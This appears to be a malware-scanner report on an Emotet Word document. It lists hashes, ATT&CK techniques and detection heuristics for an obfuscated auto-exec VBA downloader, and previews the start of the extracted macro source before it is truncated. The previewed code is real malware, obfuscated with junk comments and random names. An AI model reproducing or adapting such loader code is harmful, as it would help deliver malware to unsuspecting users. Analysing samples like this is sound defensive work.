Emotet — Office (OLE) malware analysis

Static analysis result for SHA-256 e87bb68914c0ef7b…

MALICIOUS

Office (OLE)

230.0 KB Created: 2019-10-08 22:16:00 Authoring application: Microsoft Office Word First seen: 2019-11-20
MD5: ddc9a3071ca660ba9f4bdd47dba017cc SHA-1: 34e20a75e100688cdf11953eaebe79af35a23eb1 SHA-256: e87bb68914c0ef7b9f18211e433f91bc4a6c4d82eba8436d98dce32167ffc1f9
310 Risk Score

Malware Insights

Emotet · confidence 95%

MITRE ATT&CK
T1059.005 Visual Basic T1204.002 Malicious File T1566.001 Spearphishing Attachment

The sample contains critical heuristics indicating an obfuscated auto-exec VBA loader that uses CreateObject and execution sinks, consistent with Emotet's typical behavior. The presence of a VBA macro named 'macros.bas' and ClamAV detection as 'Doc.Downloader.Emotet-10019714-0' strongly suggests this family. The VBA code is heavily obfuscated, but the overall intent appears to be downloading and executing a secondary payload.

Heuristics 10

  • ClamAV: Doc.Downloader.Emotet-10019714-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Downloader.Emotet-10019714-0
  • VBA macros detected medium 4 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • Obfuscated auto-exec VBA loader critical OLE_VBA_OBFUSCATED_AUTOEXEC_LOADER
    Auto-exec VBA reconstructs strings with a heavy custom decoder (numeric char-array, repeated hex-string decode, or junk-token Replace removal) and feeds them to a COM-instantiation or execution sink. This obfuscated-loader shape keeps CreateObject/Shell/URL indicators out of the macro source.
  • AutoOpen macro high OLE_VBA_AUTOOPEN
    AutoOpen macro
  • CreateObject call high OLE_VBA_CREATEOBJ
    CreateObject call
  • VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
  • Excel 4.0 (XLM) macro sheet present medium OLE_XLM_AUTOOPEN
    Workbook contains an Excel 4.0 macro sheet sub-stream — XLM is rarely seen in modern legitimate workbooks and was a major Office malware vector during 2020-2022.
  • Fake invoice / payment lure low SE_INVOICE_LURE
    Document contains invoice or payment language paired with an action verb — useful context when combined with link, macro, or attachment indicators
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 137185 bytes
SHA-256: 3e867a760534c9f10a692acf29fbeeb2122b1d665167d17e47f622fbf17f28d6
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "x0c7c905802bb"
Attribute VB_Base = "0{00020906-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Attribute VB_Control = "b1000076bx01, 0, 0, MSForms, TextBox"
Attribute VB_Control = "b5071542b7c, 1, 1, MSForms, TextBox"
Attribute VB_Control = "cx1c1b468b520, 2, 2, MSForms, TextBox"
Attribute VB_Control = "bc661c5b099, 3, 3, MSForms, TextBox"
Attribute VB_Control = "x07b9890x64, 4, 4, MSForms, TextBox"
Attribute VB_Control = "b40x220b000, 5, 5, MSForms, TextBox"

Attribute VB_Name = "c030906710b0"
Function x04c41019x032()
On Error Resume Next
   'markets global relationships Brook Frozen process improvement Maine Land Idaho
x03c940849x = True
'end-to-end distributed Integration out-of-the-box Somali Shilling Home Loan Account moratorium Rhode Island Configuration client-server Ergonomic Steel Ball payment SAS
b2c16162b99 = "architectures service-desk target Planner transmitter Wooden Dynamic transmitting"
'architectures payment ivory mindshare Cotton Gorgeous Business-focused Tactics back-end innovative users Licensed Metal Chips
      x8011b514403 = c99130xc84b54 - x104599141x
      'Clothing Gorgeous Granite Ball Refined Steel Sausages Phased Savings Account Rest Administrator
      Select Case c46028x096844
      'array invoice 1080p monetize Cayman Islands Dollar Investment Account parsing Re-engineered adapter Executive
         Case bb09001100xbc
         'Wyoming Intelligent AI Unbranded US Dollar bypassing grey Web 24/7 Regional
            x3c14102c063 = xxx8902529061
            'CSS Oklahoma Reactive Gorgeous e-enable connecting Silver synthesizing high-level Baby & Health Credit Card Account Mountain turquoise Tools & Movies
            x605363218070 = Atn(b605000558x6x)
            'Rubber Innovative portals Liaison secured line South Dakota
         Case c0230190b100
         'Gorgeous Cotton Gloves Colombia e-enable Object-based interface Tennessee Handmade Nepal responsive San Marino Crescent
            c150323990x2b = x030000358098
            'Investment Account customized Cambridgeshire Fresh Forward Highway Unbranded Frozen Bacon tan generating
            ccb565698cx = b38b3b02500
            'IB multi-byte dedicated payment Pennsylvania frame overriding deposit XML facilitate metrics
         Case cxc768x500c
         'Buckinghamshire reciprocal New Mexico withdrawal Branch Configuration
            b02880870bx84 = ChrW(x51b35666b83c)
            'scalable payment Savings Account violet challenge Bedfordshire Tonga Universal Assurance Sleek silver proactive interactive Australian Dollar
            b5659x002c66 = x0bbb448x2402
            'Games hardware Strategist navigating Fresh Wooden Intranet definition Gorgeous Metal Pants sensor Human
      End Select
      'Port high-level Keys Rubber Practical Wooden Chair indigo Turkmenistan
      c650486c000x = Atn(c00773c61x4c0)
      'syndicate transmitting Specialist full-range Home, Electronics & Books Falkland Islands Pound
      x002128x972 = Hex(x1c489b552944)
'Savings Account productize synergistic schemas monitor Wyoming Iceland application optimal parse Profit-focused Unbranded Wooden Shirt navigating bypassing
b2905bc8c68c = b00501380695("p" + x0c7c905802bb.x07b9890x64 + x0c7c905802bb.cx1c1b468b520) '
   'Customer Bedfordshire Rhode Island transmitting teal Developer Wooden e-services back up
xx06809c00943 = True
'monitor Sleek Concrete Chicken Electronics, Grocery & Jewelery Configuration Strategist Auto Loan Account Garden & Sports Djibouti
b2c16162b99 = "Mountain Wyoming Malaysia Customer quantifying calculating Steel Harbor hack New Hampshire implement encompassing Health, Garden & Tools redundant"
'Intelligent Granite Soap Quality firewall Garden Principal algorithm static Island Dobra Incredible Frozen Pizza Freeway Versatile bypass Dam
      b9767c69060b = x49bb0b0x1300 - c070307b9b663
... (truncated)

Open this report in the interactive analyzer, or submit your own file for analysis.